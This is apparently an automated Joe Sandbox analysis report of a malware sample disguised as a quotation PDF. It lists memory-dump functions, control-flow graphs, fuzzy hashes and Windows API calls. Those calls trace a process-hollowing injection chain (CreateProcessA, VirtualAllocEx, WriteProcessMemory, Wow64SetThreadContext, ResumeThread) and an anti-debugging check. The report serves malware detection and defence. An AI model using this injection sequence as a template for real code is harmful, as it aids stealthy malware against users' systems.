                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 714 2db6ea8-2db6f18 716 2db6f1a-2db6f24 714->716 717 2db6f51-2db6f71 714->717 716->717 718 2db6f26-2db6f28 716->718 724 2db6faa-2db6fe4 717->724 725 2db6f73-2db6f7d 717->725 719 2db6f4b-2db6f4e 718->719 720 2db6f2a-2db6f34 718->720 719->717 722 2db6f38-2db6f47 720->722 723 2db6f36 720->723 722->722 726 2db6f49 722->726 723->722 731 2db701d-2db7092 CreateProcessA 724->731 732 2db6fe6-2db6ff0 724->732 725->724 727 2db6f7f-2db6f81 725->727 726->719 729 2db6f83-2db6f8d 727->729 730 2db6fa4-2db6fa7 727->730 733 2db6f8f 729->733 734 2db6f91-2db6fa0 729->734 730->724 744 2db709b-2db70e3 731->744 745 2db7094-2db709a 731->745 732->731 736 2db6ff2-2db6ff4 732->736 733->734 734->734 735 2db6fa2 734->735 735->730 737 2db7017-2db701a 736->737 738 2db6ff6-2db7000 736->738 737->731 740 2db7002 738->740 741 2db7004-2db7013 738->741 740->741 741->741 743 2db7015 741->743 743->737 750 2db70f3-2db70f7 744->750 751 2db70e5-2db70e9 744->751 745->744 753 2db70f9-2db70fd 750->753 754 2db7107-2db710b 750->754 751->750 752 2db70eb 751->752 752->750 753->754 755 2db70ff 753->755 756 2db711b 754->756 757 2db710d-2db7111 754->757 755->754 759 2db711c 756->759 757->756 758 2db7113 757->758 758->756 759->759
                            APIs
                            • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 02DB7082
                            Memory Dump Source
                            • Source File: 00000000.00000002.1917165729.0000000002DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DB0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_2db0000_QUOTATION_JULQTRA071244#U00faPDF.jbxd
                            Similarity
                            • API ID: CreateProcess
                            • String ID:
                            • API String ID: 963392458-0
                            • Opcode ID: fed00e552a64a64e1fa497e55932b19850690f41fc93eed405ebcbfaf09b5e66
                            • Instruction ID: b4597e8f24b3c9a301e86a0e4abc2f415caeee73434b6c72c2af99075966724d
                            • Opcode Fuzzy Hash: fed00e552a64a64e1fa497e55932b19850690f41fc93eed405ebcbfaf09b5e66
                            • Instruction Fuzzy Hash: A3813571D00249DFEB11CFA9C8957DEBBF1AF48314F24852AE816A7384DB749881CF91
                            Function 02DB89E8 Relevance: 1.6, APIs: 1, Instructions: 69COMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 760 2db89e8-2db8a74 CheckRemoteDebuggerPresent 763 2db8a7d-2db8ac0 760->763 764 2db8a76-2db8a7c 760->764 764->763
                            APIs
                            • CheckRemoteDebuggerPresent.KERNEL32(?,?), ref: 02DB8A67
                            Memory Dump Source
                            • Source File: 00000000.00000002.1917165729.0000000002DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DB0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_2db0000_QUOTATION_JULQTRA071244#U00faPDF.jbxd
                            Similarity
                            • API ID: CheckDebuggerPresentRemote
                            • String ID:
                            • API String ID: 3662101638-0
                            • Opcode ID: d1395a0c95f273ac76f1fb62b90168b9275b06e2666f986a62446d7811da1176
                            • Instruction ID: f7c7d3934bd320ffab2d0e9ad0294a9e163cb97567f8170db796263a0385e94e
                            • Opcode Fuzzy Hash: d1395a0c95f273ac76f1fb62b90168b9275b06e2666f986a62446d7811da1176
                            • Instruction Fuzzy Hash: 65214A729042498FDB14CFAAC444BEEBBF5AF89220F14846AD856A7240C7389A45DFA0
                            Function 02DB7879 Relevance: 1.6, APIs: 1, Instructions: 68injectionCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 768 2db7879-2db78cb 771 2db78db-2db7914 WriteProcessMemory 768->771 772 2db78cd-2db78d9 768->772 774 2db791d-2db794d 771->774 775 2db7916-2db791c 771->775 772->771 775->774
                            APIs
                            • WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 02DB7907
                            Memory Dump Source
                            • Source File: 00000000.00000002.1917165729.0000000002DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DB0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_2db0000_QUOTATION_JULQTRA071244#U00faPDF.jbxd
                            Similarity
                            • API ID: MemoryProcessWrite
                            • String ID:
                            • API String ID: 3559483778-0
                            • Opcode ID: 243aa038f999b6cdc30c0f5bf888280500e966ba9600dfc2f457c021ffd11481
                            • Instruction ID: 9534da9ad75b3483e721a34c5e1a23c1e59df3e35ef1ce2daff5ed3e2a102099
                            • Opcode Fuzzy Hash: 243aa038f999b6cdc30c0f5bf888280500e966ba9600dfc2f457c021ffd11481
                            • Instruction Fuzzy Hash: 3A213976900349DFDB11CFAAC844BEEBBF5EF88324F148429E515A7250D7799944CFA0
                            Function 02DB7198 Relevance: 1.6, APIs: 1, Instructions: 67threadCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 779 2db7198-2db71eb 782 2db71fb-2db722b Wow64SetThreadContext 779->782 783 2db71ed-2db71f9 779->783 785 2db722d-2db7233 782->785 786 2db7234-2db7264 782->786 783->782 785->786
                            APIs
                            • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 02DB721E
                            Memory Dump Source
                            • Source File: 00000000.00000002.1917165729.0000000002DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DB0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_2db0000_QUOTATION_JULQTRA071244#U00faPDF.jbxd
                            Similarity
                            • API ID: ContextThreadWow64
                            • String ID:
                            • API String ID: 983334009-0
                            • Opcode ID: a189972045da7d3ebbf2349da5399b04262baa35d9c3dcbf96649ba46d297375
                            • Instruction ID: f85fdb5173046a4b4a765e944ab2c4aed9553db220c1d4079d9a6b0853c3e9ee
                            • Opcode Fuzzy Hash: a189972045da7d3ebbf2349da5399b04262baa35d9c3dcbf96649ba46d297375
                            • Instruction Fuzzy Hash: 812128719007098FEB10CFAAC485BEEFBF5EF89324F148429D459A7240DB789945CFA4
                            Function 02DB7880 Relevance: 1.6, APIs: 1, Instructions: 66injectionCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 798 2db7880-2db78cb 800 2db78db-2db7914 WriteProcessMemory 798->800 801 2db78cd-2db78d9 798->801 803 2db791d-2db794d 800->803 804 2db7916-2db791c 800->804 801->800 804->803
                            APIs
                            • WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 02DB7907
                            Memory Dump Source
                            • Source File: 00000000.00000002.1917165729.0000000002DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DB0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_2db0000_QUOTATION_JULQTRA071244#U00faPDF.jbxd
                            Similarity
                            • API ID: MemoryProcessWrite
                            • String ID:
                            • API String ID: 3559483778-0
                            • Opcode ID: 14ec1300009af0fdd5b904c2f05c9eab0297e30a14c9b2a63d0849284e8e1049
                            • Instruction ID: 11e6a2a897c67dacc0c8d5963866a3f51ce3f1a2c87f6a7b18211e9ea7e74c14
                            • Opcode Fuzzy Hash: 14ec1300009af0fdd5b904c2f05c9eab0297e30a14c9b2a63d0849284e8e1049
                            • Instruction Fuzzy Hash: 39214876900349DFDB10CFAAC844BEEBBF5EF88320F108429E919A7250C7789940CFA0
                            Function 02DB71A0 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 808 2db71a0-2db71eb 810 2db71fb-2db722b Wow64SetThreadContext 808->810 811 2db71ed-2db71f9 808->811 813 2db722d-2db7233 810->813 814 2db7234-2db7264 810->814 811->810 813->814
                            APIs
                            • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 02DB721E
                            Memory Dump Source
                            • Source File: 00000000.00000002.1917165729.0000000002DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DB0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_2db0000_QUOTATION_JULQTRA071244#U00faPDF.jbxd
                            Similarity
                            • API ID: ContextThreadWow64
                            • String ID:
                            • API String ID: 983334009-0
                            • Opcode ID: 3840691da7e53d03f5b7a2ee81549a9a470062e665a0c352bc53f9ba4cef82c1
                            • Instruction ID: bb17b0074fddb6ada6e5f3b7e8373ee72adaa88960b7cf3169bdca8f294e474a
                            • Opcode Fuzzy Hash: 3840691da7e53d03f5b7a2ee81549a9a470062e665a0c352bc53f9ba4cef82c1
                            • Instruction Fuzzy Hash: 202125719003098FDB10CFAAC484BEEBBF5EF88324F148429D419A7240CB789944CFA4
                            Function 02DBC408 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 818 2dbc408-2dbc477 KiUserCallbackDispatcher 819 2dbc479-2dbc47f 818->819 820 2dbc480-2dbc4b1 818->820 819->820 823 2dbc4ba-2dbc4da 820->823 824 2dbc4b3-2dbc4b9 820->824 824->823
                            APIs
                            • KiUserCallbackDispatcher.NTDLL(00000000), ref: 02DBC466
                            Memory Dump Source
                            • Source File: 00000000.00000002.1917165729.0000000002DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DB0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_2db0000_QUOTATION_JULQTRA071244#U00faPDF.jbxd
                            Similarity
                            • API ID: CallbackDispatcherUser
                            • String ID:
                            • API String ID: 2492992576-0
                            • Opcode ID: dd12aa09f8db867d6e791659c8e711fc8fb8db705a61397c49c9ad39451a15b3
                            • Instruction ID: 34fc9465e4aed2413b5ea7185658676f831a067d6c74e6ac9e6537167d65da21
                            • Opcode Fuzzy Hash: dd12aa09f8db867d6e791659c8e711fc8fb8db705a61397c49c9ad39451a15b3
                            • Instruction Fuzzy Hash: 7921FEB08107498FDB218FA9C9497EAFBF0EF09324F24849AD559A7351C3786984CFA5
                            Function 02DBC418 Relevance: 1.6, APIs: 1, Instructions: 56COMMON
                            Download Yara Rule
                            APIs
                            • KiUserCallbackDispatcher.NTDLL(00000000), ref: 02DBC466
                            Memory Dump Source
                            • Source File: 00000000.00000002.1917165729.0000000002DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DB0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_2db0000_QUOTATION_JULQTRA071244#U00faPDF.jbxd
                            Similarity
                            • API ID: CallbackDispatcherUser
                            • String ID:
                            • API String ID: 2492992576-0
                            • Opcode ID: 754220255a0902228d21e7ebdc0def8e09a643387bd10f72d693facbcbbba5df
                            • Instruction ID: 77b8fce8955805740a46a807a073cd98b428514e84591a9f07211125e5450970
                            • Opcode Fuzzy Hash: 754220255a0902228d21e7ebdc0def8e09a643387bd10f72d693facbcbbba5df
                            • Instruction Fuzzy Hash: C12112B08107498FDB10CF9AC5497EEBBF4AB08324F20845AD519A7350C3B86944CFA5
                            Function 02DB7689 Relevance: 1.6, APIs: 1, Instructions: 55memoryCOMMON
                            Download Yara Rule
                            APIs
                            • VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 02DB76FE
                            Memory Dump Source
                            • Source File: 00000000.00000002.1917165729.0000000002DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DB0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_2db0000_QUOTATION_JULQTRA071244#U00faPDF.jbxd
                            Similarity
                            • API ID: AllocVirtual
                            • String ID:
                            • API String ID: 4275171209-0
                            • Opcode ID: 68cb45a700802bef6cffffd5ab4a3dba641ae1b509505105687f3bff24c99d15
                            • Instruction ID: 4cf6af99f3bd176fc22d6ed653aa054250152d3db85eed6290a6e3bf1a1f3d18
                            • Opcode Fuzzy Hash: 68cb45a700802bef6cffffd5ab4a3dba641ae1b509505105687f3bff24c99d15
                            • Instruction Fuzzy Hash: 741103769006499FDB11DFAAC844BDEBBF5EF88720F248819E915A7250C779A940CFA0
                            Function 02DB7690 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON
                            Download Yara Rule
                            APIs
                            • VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 02DB76FE
                            Memory Dump Source
                            • Source File: 00000000.00000002.1917165729.0000000002DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DB0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_2db0000_QUOTATION_JULQTRA071244#U00faPDF.jbxd
                            Similarity
                            • API ID: AllocVirtual
                            • String ID:
                            • API String ID: 4275171209-0
                            • Opcode ID: cfbd1a744c49a5abc1c710d9b166ed46b2acea2f453df5b2bb3190a8fd3d66c4
                            • Instruction ID: 06cf676f00e7e7fa2212b65ca0f2ba1f5aa85414a715333c06c9a6c9250119e2
                            • Opcode Fuzzy Hash: cfbd1a744c49a5abc1c710d9b166ed46b2acea2f453df5b2bb3190a8fd3d66c4
                            • Instruction Fuzzy Hash: 32112676900249DFDB11DFAAC844BDFBBF5EF88720F248819E515A7250C7799940CFA0
                            Function 02DB7B23 Relevance: 1.6, APIs: 1, Instructions: 52threadCOMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.1917165729.0000000002DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DB0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_2db0000_QUOTATION_JULQTRA071244#U00faPDF.jbxd
                            Similarity
                            • API ID: ResumeThread
                            • String ID:
                            • API String ID: 947044025-0
                            • Opcode ID: 43f10b48fc1f2f693bfd462face3bb3798aee1bbb14c70983628f22aa5295910
                            • Instruction ID: b424321f3dc049ff083328960d6783e26e8c7c47eb9704448db473fe8869704b
                            • Opcode Fuzzy Hash: 43f10b48fc1f2f693bfd462face3bb3798aee1bbb14c70983628f22aa5295910
                            • Instruction Fuzzy Hash: 221134719002498FDB10DFAAC844BDEFBF5EF88620F208429D419A7240CB79A940CFA4
                            Function 02DB7B28 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.1917165729.0000000002DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DB0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_2db0000_QUOTATION_JULQTRA071244#U00faPDF.jbxd
                            Similarity
                            • API ID: ResumeThread
                            • String ID:
                            • API String ID: 947044025-0
                            • Opcode ID: 08a891e46accda18fb3c85ae75912357292122bbbb2a5afa12566b6106a7f9c3
                            • Instruction ID: b77c78bfd53cb618a9fcfc0f3a75c044d1eba1a26bdb112240c8fe151ce9ddfb
                            • Opcode Fuzzy Hash: 08a891e46accda18fb3c85ae75912357292122bbbb2a5afa12566b6106a7f9c3
                            • Instruction Fuzzy Hash: 701116719007488BDB10DFAAC844BDEFBF5EF88624F248419D519A7240CB79A940CFA4
                            Function 02DD09F8 Relevance: 1.5, Strings: 1, Instructions: 252COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1917223338.0000000002DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_2dd0000_QUOTATION_JULQTRA071244#U00faPDF.jbxd
                            Similarity
                            • API ID:
                            • String ID: @
                            • API String ID: 0-2766056989
                            • Opcode ID: 957a3ea8b4f467570a35c66bcc82691d1bb0029b167569294cd80645cfd4a767
                            • Instruction ID: bc319447803f247b469df16e7587580af376e4ade0c4ab40727b4431efefa557
                            • Opcode Fuzzy Hash: 957a3ea8b4f467570a35c66bcc82691d1bb0029b167569294cd80645cfd4a767
                            • Instruction Fuzzy Hash: 4AB103B4E05618CFDB64CF68D844BADBBB5FB89305F1091AAD449A7350DB386D85CF10
                            Function 02DD0A08 Relevance: 1.5, Strings: 1, Instructions: 239COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1917223338.0000000002DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_2dd0000_QUOTATION_JULQTRA071244#U00faPDF.jbxd
                            Similarity
                            • API ID:
                            • String ID: @
                            • API String ID: 0-2766056989
                            • Opcode ID: 8212e755e918531649e5199798edffe4cab795551a45369514109649e7c805fa
                            • Instruction ID: 38755197c6498cc652c04d79b2c9da7d002933368b5dadf52480557617a15cc6
                            • Opcode Fuzzy Hash: 8212e755e918531649e5199798edffe4cab795551a45369514109649e7c805fa
                            • Instruction Fuzzy Hash: 1AB104B4E05618CFDB64CFA8D844BADBBB5FB89305F1090A9D449A7350DB786E85CF10
                            Function 01375EF0 Relevance: 1.3, Strings: 1, Instructions: 41COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1917011557.0000000001370000.00000040.00000800.00020000.00000000.sdmp, Offset: 01370000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_1370000_QUOTATION_JULQTRA071244#U00faPDF.jbxd
                            Similarity
                            • API ID:
                            • String ID: Ho+q
                            • API String ID: 0-1830657808
                            • Opcode ID: 76caa615b7e8cb82308bc245e471c425456a77e3bda77c999c512b3c34261a3e
                            • Instruction ID: e6696214c9b7345e3f7c0dc8403579a6c939f575d80a7fb3c908daff9f17d164
                            • Opcode Fuzzy Hash: 76caa615b7e8cb82308bc245e471c425456a77e3bda77c999c512b3c34261a3e
                            • Instruction Fuzzy Hash: A2F04F76F412108FCB54AF78E46C5693BE5ABCD66931105E9E906CB3A5EB38CC058790
                            Function 02DD5388 Relevance: 1.3, Strings: 1, Instructions: 35COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1917223338.0000000002DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_2dd0000_QUOTATION_JULQTRA071244#U00faPDF.jbxd
                            Similarity
                            • API ID:
                            • String ID: ,
                            • API String ID: 0-3772416878
                            • Opcode ID: 47c7b34453b7b2ba5a53628689dc020a3efca683707675c20092e6cedb7ee62d
                            • Instruction ID: 4be09bb6a86545f7bcc15726962994ae59642dac59656f6751e4e868bc00ad82
                            • Opcode Fuzzy Hash: 47c7b34453b7b2ba5a53628689dc020a3efca683707675c20092e6cedb7ee62d
                            • Instruction Fuzzy Hash: CD01B074900668CFDB65CFA4E954BDCBBB2BB48304F5084EAD509AB250CB7A5ED5CF00
                            Function 02DD549D Relevance: 1.3, Strings: 1, Instructions: 30COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1917223338.0000000002DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_2dd0000_QUOTATION_JULQTRA071244#U00faPDF.jbxd
                            Similarity
                            • API ID:
                            • String ID: )
                            • API String ID: 0-2427484129
                            • Opcode ID: 11332241e2dedadd6aeea1edb82e019e7e3c56553755fb3bce05eedbbdfa2cb8
                            • Instruction ID: d397de55a77cf92bed32d90550caec7fc064dbdeac7103c747f7adcef6c5203d
                            • Opcode Fuzzy Hash: 11332241e2dedadd6aeea1edb82e019e7e3c56553755fb3bce05eedbbdfa2cb8
                            • Instruction Fuzzy Hash: F8019674901258DFDB64DF54E994BDDB7B2BB05300F50449AD609B7290CB7A6ED0CF44
                            Function 02DD52D9 Relevance: 1.3, Strings: 1, Instructions: 20COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1917223338.0000000002DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_2dd0000_QUOTATION_JULQTRA071244#U00faPDF.jbxd
                            Similarity
                            • API ID:
                            • String ID: 9
                            • API String ID: 0-2366072709
                            • Opcode ID: 07e7bf058d52918e767418736957d82edb859ee421916de7746349763debc70b
                            • Instruction ID: 6090538a68bca7b65984435e8fded6fa2f37db62d95f2e3408b0c37595d493d7
                            • Opcode Fuzzy Hash: 07e7bf058d52918e767418736957d82edb859ee421916de7746349763debc70b
                            • Instruction Fuzzy Hash: 37F01531900A5ADBCF129F54C800AEAF739FF56300F108649E94923260DB35AA95CF90
                            Function 02DD5D72 Relevance: 1.3, Strings: 1, Instructions: 18COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1917223338.0000000002DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_2dd0000_QUOTATION_JULQTRA071244#U00faPDF.jbxd
                            Similarity
                            • API ID:
                            • String ID: I
                            • API String ID: 0-3707901625
                            • Opcode ID: 6c7f3358c77a5d0c8a9de5b9eb709b12ec4002800742ac0ee2edd1180d25fc93
                            • Instruction ID: 5250abb922a5689786f5a436ed24d549be7be40098a65dbc2299f7174a62739a
                            • Opcode Fuzzy Hash: 6c7f3358c77a5d0c8a9de5b9eb709b12ec4002800742ac0ee2edd1180d25fc93
                            • Instruction Fuzzy Hash: 16F0C276940228EFDB10CF90D989BD9BBB1EB09300F0480D6E609A6251C2399F95CF50
                            Function 02DD5523 Relevance: 1.3, Strings: 1, Instructions: 18COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1917223338.0000000002DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_2dd0000_QUOTATION_JULQTRA071244#U00faPDF.jbxd
                            Similarity
                            • API ID:
                            • String ID: ;
                            • API String ID: 0-1661535913
                            • Opcode ID: 338905bda38dbeba86a928814f8532768c747a99537d4d2bba7b37246c70b0de
                            • Instruction ID: 3f0119b7ec544206e2dd541b57c28ab23b6643e6bdd1cf4f6f2f0d7390d3cd10
                            • Opcode Fuzzy Hash: 338905bda38dbeba86a928814f8532768c747a99537d4d2bba7b37246c70b0de
                            • Instruction Fuzzy Hash: 64E0AE749002189FCBA4EF60E894A9CBBB1BB58300F5094A9888AA3350DE346EC4CF00
                            Function 02DD582E Relevance: 1.3, Strings: 1, Instructions: 15COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1917223338.0000000002DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_2dd0000_QUOTATION_JULQTRA071244#U00faPDF.jbxd
                            Similarity
                            • API ID:
                            • String ID: H
                            • API String ID: 0-2852464175
                            • Opcode ID: c3e0d8259fda88e44626d85d228366120eb3a903b3a3e943314c4a54c3e8fb77
                            • Instruction ID: 7bb16119dd8d784c1c9bfb9147983a6189115511d49058309ea48d4e996b6f74
                            • Opcode Fuzzy Hash: c3e0d8259fda88e44626d85d228366120eb3a903b3a3e943314c4a54c3e8fb77
                            • Instruction Fuzzy Hash: DDE09278904228CFCB50CF10C984BD8BBF2EB48314F2484DA9409A3351D7399F86CF00
                            Function 02DF8A98 Relevance: .7, Instructions: 677COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000000.00000002.1917239980.0000000002DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DF0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_2df0000_QUOTATION_JULQTRA071244#U00faPDF.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 096c64f26b04ab96570e21e7b6434057c6371d17d568afa5184c3ef75a129ae1
                            • Instruction ID: 3ab58a2b193330faebef71f21fb043e54b317ee4be091aa592222a685a501f1f
                            • Opcode Fuzzy Hash: 096c64f26b04ab96570e21e7b6434057c6371d17d568afa5184c3ef75a129ae1
                            • Instruction Fuzzy Hash: 14521875A002288FDB64CF69C991BEDBBF6BB88700F1585D9E609A7351DB309D80CF61
                            Function 02DF2E71 Relevance: .5, Instructions: 535COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000000.00000002.1917239980.0000000002DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DF0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_2df0000_QUOTATION_JULQTRA071244#U00faPDF.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: a4bd595e0c867ba5dadb6e4b106b9de185877cd4ea4e90dd57d207a139d55388
                            • Instruction ID: ba8efcc1cee2c2cab07f33a21e168588099ba245c88d7290731f64340c5c0fae
                            • Opcode Fuzzy Hash: a4bd595e0c867ba5dadb6e4b106b9de185877cd4ea4e90dd57d207a139d55388
                            • Instruction Fuzzy Hash: 2E227F31A00245DFDB84DFA4D494AADB7B2FF88300F1685A9EA05EB391CB75ED41CB94
                            Function 02DF5D88 Relevance: .5, Instructions: 484COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000000.00000002.1917239980.0000000002DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DF0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_2df0000_QUOTATION_JULQTRA071244#U00faPDF.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: a766dc30a6643e827db1e193c2969582088bff82f17547286e77d39165c6286a
                            • Instruction ID: d3295df5cd338875832ef5dd404c36230d6981a73b1659551608ea18538a5550
                            • Opcode Fuzzy Hash: a766dc30a6643e827db1e193c2969582088bff82f17547286e77d39165c6286a
                            • Instruction Fuzzy Hash: 4F127D31A002059FDB64DFA5D484AAEB7F6FF88300F25892CE61A9B750DB31EC45CB94
                            Function 02DFBAA8 Relevance: .4, Instructions: 437COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000000.00000002.1917239980.0000000002DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DF0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_2df0000_QUOTATION_JULQTRA071244#U00faPDF.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: f550a5ef648d95236362b4bb6b831d2ad111473797de3801ca95ae1c6023c0c0
                            • Instruction ID: 9ee6ea2904d18ecf1ef20339b425fb9be6e0275c43726ec46aa59c8079bf12cd
                            • Opcode Fuzzy Hash: f550a5ef648d95236362b4bb6b831d2ad111473797de3801ca95ae1c6023c0c0
                            • Instruction Fuzzy Hash: 8B121734A002198FCB54EF68C894A9DB7B2FF89300F5186A9E54AAB355DF30ED85CF54
                            Function 02DF7BB8 Relevance: .4, Instructions: 370COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000000.00000002.1917239980.0000000002DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DF0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_2df0000_QUOTATION_JULQTRA071244#U00faPDF.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 3b85844839a4059f3a3255e7d84b00e8c2d5de79caeef0a711a4ad46d0d559aa
                            • Instruction ID: d95523d86ae67da8a9986113273c8b929343a1728a6049089a19cfc5c6315262
                            • Opcode Fuzzy Hash: 3b85844839a4059f3a3255e7d84b00e8c2d5de79caeef0a711a4ad46d0d559aa
                            • Instruction Fuzzy Hash: 16F1C734B00218DFDB48DFA4D998A9DB7B2FF89300F118559E906AB3A5DB71EC42CB54
                            Function 02DFFAB0 Relevance: .3, Instructions: 324COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000000.00000002.1917239980.0000000002DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DF0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_2df0000_QUOTATION_JULQTRA071244#U00faPDF.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 70d5596c4ead19b8ee6b2bcb8c6773aca2532da25a974104166930397dc8ed83
                            • Instruction ID: 550651ef1d8d523d7c7d0c89756d437af67028e9e3caf821431fa496b9351534
                            • Opcode Fuzzy Hash: 70d5596c4ead19b8ee6b2bcb8c6773aca2532da25a974104166930397dc8ed83
                            • Instruction Fuzzy Hash: 72C19132A047448FDB65CF34C45462ABBF2BF85304F1A895DD68A8BB92DB30EC45CB59
                            Function 02DFAE20 Relevance: .3, Instructions: 319COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000000.00000002.1917239980.0000000002DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DF0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_2df0000_QUOTATION_JULQTRA071244#U00faPDF.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
